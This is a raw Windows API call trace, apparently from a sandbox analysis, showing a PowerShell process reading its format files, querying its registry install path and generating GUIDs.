	[0813.161] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.161] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.161] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.161] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.161] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.162] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.162] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.164] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.164] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.164] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.165] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.165] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.165] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.166] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.166] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.171] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.172] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.172] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.172] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.173] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.173] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.174] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.174] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.174] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.175] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.178] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.178] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.179] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.179] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.180] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.180] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.186] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.187] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.187] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.188] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.188] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.188] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.189] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.189] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.189] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.190] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.190] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.190] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.191] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.191] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.191] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.192] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.192] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.192] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.193] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.193] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.193] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.194] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.194] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.194] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0813.195] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0814.388] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0814.389] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0814.389] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0814.389] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0814.390] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0814.390] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0xf37, lpOverlapped=0x0) returned 1
	[0814.390] ReadFile (in: hFile=0x304, lpBuffer=0x33d1897, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d1897*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0814.391] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0814.391] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0814.391] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0814.391] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0814.391] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0814.391] CoTaskMemFree (pv=0x1b7f8c30) 
	[0814.392] RegCloseKey (hKey=0x304) returned 0x0
	[0814.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0814.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0814.396] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6712e5b0, Data2=0xcea4, Data3=0x48e4, Data4=([0]=0xb2, [1]=0xe7, [2]=0xf1, [3]=0xa9, [4]=0xcf, [5]=0x75, [6]=0x75, [7]=0x9f))) returned 0x0
	[0814.396] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x62a92a8f, Data2=0xc17, Data3=0x4276, Data4=([0]=0xb7, [1]=0x6b, [2]=0x95, [3]=0x15, [4]=0x91, [5]=0x75, [6]=0x3d, [7]=0xca))) returned 0x0
	[0814.404] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5de08bd1, Data2=0xfb2c, Data3=0x4ee3, Data4=([0]=0xa8, [1]=0xe8, [2]=0x25, [3]=0x42, [4]=0xb8, [5]=0x75, [6]=0xd9, [7]=0x34))) returned 0x0
	[0814.410] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x95e9b642, Data2=0xfd7c, Data3=0x44e2, Data4=([0]=0xb8, [1]=0x6, [2]=0x40, [3]=0x8a, [4]=0xd, [5]=0xc8, [6]=0xe5, [7]=0xab))) returned 0x0
	[0815.837] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x335485c6, Data2=0xd3ca, Data3=0x4591, Data4=([0]=0xa9, [1]=0xcc, [2]=0xc5, [3]=0x6b, [4]=0xec, [5]=0xf5, [6]=0xe1, [7]=0xff))) returned 0x0
	[0815.838] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x957734be, Data2=0x6acd, Data3=0x42df, Data4=([0]=0x8e, [1]=0xfa, [2]=0xe5, [3]=0x65, [4]=0x1c, [5]=0x9, [6]=0xe2, [7]=0xbd))) returned 0x0
	[0815.840] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcd31ad10, Data2=0x66f7, Data3=0x4ed8, Data4=([0]=0xbd, [1]=0xf1, [2]=0xdd, [3]=0x76, [4]=0x8c, [5]=0x15, [6]=0xb3, [7]=0xbc))) returned 0x0
	[0815.841] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x21d22942, Data2=0x2882, Data3=0x4cd3, Data4=([0]=0xb1, [1]=0x3c, [2]=0xc9, [3]=0x18, [4]=0x8, [5]=0x23, [6]=0xc6, [7]=0xd0))) returned 0x0
	[0815.841] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc73af769, Data2=0xe322, Data3=0x4681, Data4=([0]=0x90, [1]=0xce, [2]=0xc1, [3]=0x1f, [4]=0x54, [5]=0xbb, [6]=0x53, [7]=0x6f))) returned 0x0
	[0815.841] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb8eb4b2, Data2=0xf1b, Data3=0x49f0, Data4=([0]=0x85, [1]=0xf, [2]=0x8c, [3]=0x23, [4]=0xb9, [5]=0xbb, [6]=0x59, [7]=0x6))) returned 0x0
	[0815.841] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x723b2d11, Data2=0xf144, Data3=0x4663, Data4=([0]=0xb7, [1]=0x7d, [2]=0x74, [3]=0xe4, [4]=0x29, [5]=0xe3, [6]=0xbb, [7]=0x36))) returned 0x0
	[0815.842] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xfaeb0da5, Data2=0xc40a, Data3=0x4f4b, Data4=([0]=0x94, [1]=0x2e, [2]=0x70, [3]=0xa2, [4]=0x9c, [5]=0x62, [6]=0x19, [7]=0xcf))) returned 0x0
	[0815.842] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9728f155, Data2=0xc42f, Data3=0x4b72, Data4=([0]=0x89, [1]=0xba, [2]=0x45, [3]=0x99, [4]=0xdb, [5]=0x16, [6]=0xee, [7]=0x87))) returned 0x0
	[0815.842] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6639c4b2, Data2=0x1a44, Data3=0x417c, Data4=([0]=0xae, [1]=0xac, [2]=0x4, [3]=0x48, [4]=0x6e, [5]=0xa5, [6]=0x2d, [7]=0x33))) returned 0x0
	[0815.842] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe16b9026, Data2=0x6942, Data3=0x4d89, Data4=([0]=0xba, [1]=0x71, [2]=0x4c, [3]=0x56, [4]=0xe6, [5]=0x7b, [6]=0x42, [7]=0xc3))) returned 0x0
	[0815.843] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x51d42615, Data2=0x7522, Data3=0x4045, Data4=([0]=0xa6, [1]=0x7f, [2]=0xe2, [3]=0x62, [4]=0x6f, [5]=0xa3, [6]=0xb5, [7]=0xe0))) returned 0x0
	[0815.855] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xba74cf10, Data2=0xa679, Data3=0x4b34, Data4=([0]=0x87, [1]=0x53, [2]=0x17, [3]=0x2a, [4]=0x64, [5]=0xf3, [6]=0xf, [7]=0x1b))) returned 0x0
	[0815.855] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xea65e3b4, Data2=0xc5e5, Data3=0x4798, Data4=([0]=0xa8, [1]=0x3a, [2]=0x89, [3]=0xdb, [4]=0x64, [5]=0x92, [6]=0x8a, [7]=0x9a))) returned 0x0
	[0815.856] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2f20df9a, Data2=0x1d50, Data3=0x47d5, Data4=([0]=0xae, [1]=0xc9, [2]=0x31, [3]=0xea, [4]=0x2c, [5]=0x9b, [6]=0xb8, [7]=0x63))) returned 0x0
	[0815.856] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd92f97a, Data2=0x1c40, Data3=0x436e, Data4=([0]=0xa9, [1]=0xd, [2]=0x4c, [3]=0x19, [4]=0xa5, [5]=0xfc, [6]=0xf3, [7]=0xe7))) returned 0x0
	[0815.856] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe765df9e, Data2=0x1da5, Data3=0x40c7, Data4=([0]=0x8b, [1]=0x12, [2]=0x27, [3]=0x3b, [4]=0x47, [5]=0xff, [6]=0xf9, [7]=0xd))) returned 0x0
	[0815.856] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x31eb9012, Data2=0xaf94, Data3=0x4422, Data4=([0]=0x82, [1]=0xd6, [2]=0x1e, [3]=0x26, [4]=0x66, [5]=0xe2, [6]=0x81, [7]=0xd))) returned 0x0
	[0815.857] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf930ed84, Data2=0x4aa3, Data3=0x4b98, Data4=([0]=0x90, [1]=0x91, [2]=0x12, [3]=0xf8, [4]=0x73, [5]=0x32, [6]=0x2c, [7]=0x72))) returned 0x0
	[0815.857] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa4276cc4, Data2=0xd220, Data3=0x4462, Data4=([0]=0xb2, [1]=0x94, [2]=0xd4, [3]=0x6f, [4]=0xa0, [5]=0x3a, [6]=0xec, [7]=0x93))) returned 0x0
	[0815.860] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x74c2187a, Data2=0x6fb, Data3=0x4903, Data4=([0]=0x8d, [1]=0x13, [2]=0x30, [3]=0xec, [4]=0x7e, [5]=0x6b, [6]=0x82, [7]=0xfc))) returned 0x0
	[0815.860] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0815.861] GetFileType (hFile=0x304) returned 0x1
	[0815.861] SetErrorMode (uMode=0x1) returned 0x1
	[0815.861] GetFileType (hFile=0x304) returned 0x1
	[0815.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
